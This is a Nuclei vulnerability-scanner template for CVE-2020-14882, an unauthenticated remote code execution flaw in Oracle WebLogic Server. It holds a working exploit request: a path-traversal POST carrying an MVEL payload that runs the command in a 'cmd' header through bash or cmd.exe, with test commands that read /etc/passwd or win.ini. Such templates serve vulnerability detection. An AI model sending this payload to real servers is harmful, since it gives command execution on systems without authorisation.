nuclei-templates/cves/2020/CVE-2020-14882.yaml

46 lines
3.1 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-14882
info:
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
author: dwisiswant0
severity: critical
2021-03-12 07:10:16 +00:00
reference: |
2021-03-11 15:26:35 +00:00
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
- https://twitter.com/jas502n/status/1321416053050667009
- https://youtu.be/JFVDOIL0YtA
- https://github.com/jas502n/CVE-2020-14882#eg
description: |
Vulnerability in the Oracle WebLogic Server
product of Oracle Fusion Middleware (component: Console).
Supported versions that are affected are 10.3.6.0.0,
12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
Easily exploitable vulnerability allows unauthenticated
attacker with network access via HTTP to compromise the server.
Successful attacks of this vulnerability can result in takeover.
tags: cve,cve2020,oracle,rce,weblogic
requests:
- payloads:
exec:
- "type C:\\Windows\\win.ini" # Windows
- "cat /etc/passwd" # *nix
raw:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
cmd: §exec§
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:
- 200